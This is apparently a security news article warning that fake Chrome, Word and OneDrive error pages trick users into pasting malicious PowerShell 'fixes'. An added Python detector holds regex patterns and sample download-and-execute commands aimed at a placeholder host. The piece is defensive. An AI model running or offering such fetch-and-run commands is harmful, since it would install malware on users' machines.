Beware of Fake Error Messages Deploying Malware
Image – Bleeping Computer
Recent cyber attacks have employed a clever social engineering technique to trick users into running malicious PowerShell scripts on their computers. Multiple threat actors, including the notorious TA571 spam group and a cluster named “ClearFake”, have been using fake browser and document errors to deploy various malware payloads.
The Attack Vector
The attacks begin with users either visiting a compromised website or receiving a malicious HTML attachment pretending to be a Word document or file hosted on OneDrive. The malicious code on the webpage or within the HTML file displays a realistic-looking error message stating there is a problem with Google Chrome, Word, or OneDrive.
Fake Google Chrome error (Source: Proofpoint)
The fake error messages instruct the user to run a “fix” by copying a PowerShell script to their clipboard and pasting it into the PowerShell terminal or the Windows Run dialog, or otherwise running it directly. When executed, the PowerShell script initiates a sequence of events leading to the download and installation of malware on the victim’s system.
Malware Payloads
The PowerShell scripts have been observed deploying a range of malicious payloads, including:
The payloads allow the attackers to gain remote control, steal data, mine cryptocurrencies, and perform other malicious activities on the compromised systems.
Clever Social Engineering
While the attack requires user interaction to succeed, the social engineering tactics make it deceptively convincing. The fake error messages mimic legitimate warnings, providing both a perceived problem and solution in a single display. Users may be prompted to act quickly before considering the potential risks.
Furthermore, because the malicious code is run directly from the clipboard rather than from an executable file, it may bypass some security protections that scan for and block malware files.
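As an added defender-side illustration (not code from the original article): a small Python triage routine over constructed PowerShell script-block text, modelled on what PowerShell Script Block Logging (Event ID 4104) records, which captures commands pasted into the console even though no file is ever written to disk. The regexes, weights and sample commands are assumptions chosen for the illustration; it also decodes a `-EncodedCommand` argument (base64 of UTF-16LE) so the wrapped command is scored rather than just the wrapper.

```python
from __future__ import annotations
import base64
import re

# Signatures for the pieces of a paste-and-run "fix": fetch from the network,
# execute in memory, hide the window, or wrap the command in base64.
DOWNLOAD = re.compile(r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|"
                      r"Invoke-RestMethod|irm|curl|wget|Net\.WebClient)\b", re.I)
EXECUTE = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|"
                    r"-executionpolicy\s+bypass", re.I)
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{20,})", re.I)

# Constructed samples (not real logs) modelled on script-block text recorded by
# Event ID 4104; the domain is a reserved placeholder, not a real indicator.
ENCODED_SAMPLE = base64.b64encode(
    "iex (iwr 'http://example.invalid/fix.ps1')".encode("utf-16-le")).decode()
SAMPLE_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Sort-Object Length",
    "powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/fix.ps1')\"",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/chrome-fix.txt')",
    "powershell -EncodedCommand " + ENCODED_SAMPLE,
    "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",
]

def decode_encoded_command(block: str):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_block(block: str) -> tuple[int, list[str]]:
    """Score one logged script block; higher means more like the paste-and-run chain."""
    hits, text = [], block
    if ENCODED.search(block):
        hits.append("encoded-command")
        decoded = decode_encoded_command(block)
        if decoded:
            text += " " + decoded  # scan the decoded payload, not just the wrapper
    for name, pattern in (("download", DOWNLOAD), ("in-memory-exec", EXECUTE),
                          ("evasion-flags", HIDDEN)):
        if pattern.search(text):
            hits.append(name)
    score = len(hits)
    if "download" in hits and "in-memory-exec" in hits:
        score += 2  # fetch-then-execute is the core of the chain described above
    return score, hits
```

A plain download with `-OutFile` scores 1 and would sit below a threshold of 2, while the fetch-and-execute samples score 4 or higher; tune the weights against your own baseline of administrative PowerShell use.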
Protect Yourself
To avoid falling victim to these types of attacks, exercise caution with any prompts to copy/paste and run commands, even if they appear to be from trusted sources like operating systems or productivity software. Double check the validity of such warnings through official support channels before following instructions.
Maintain updated security software, browse the web cautiously, and think critically before enabling any suspicious scripts, downloads, or programs. User education is crucial to identify and report these social engineering attempts.
If you suspect your system has been compromised, immediately disconnect from the network, run anti-malware scans, and contact cyber security professionals to remediate the infection.
Stay vigilant against evolving cyber threats that employ clever tactics to bypass security measures. With proper awareness and precautions, you can protect yourself and your organisation from malware deployment schemes abusing trusted system utilities.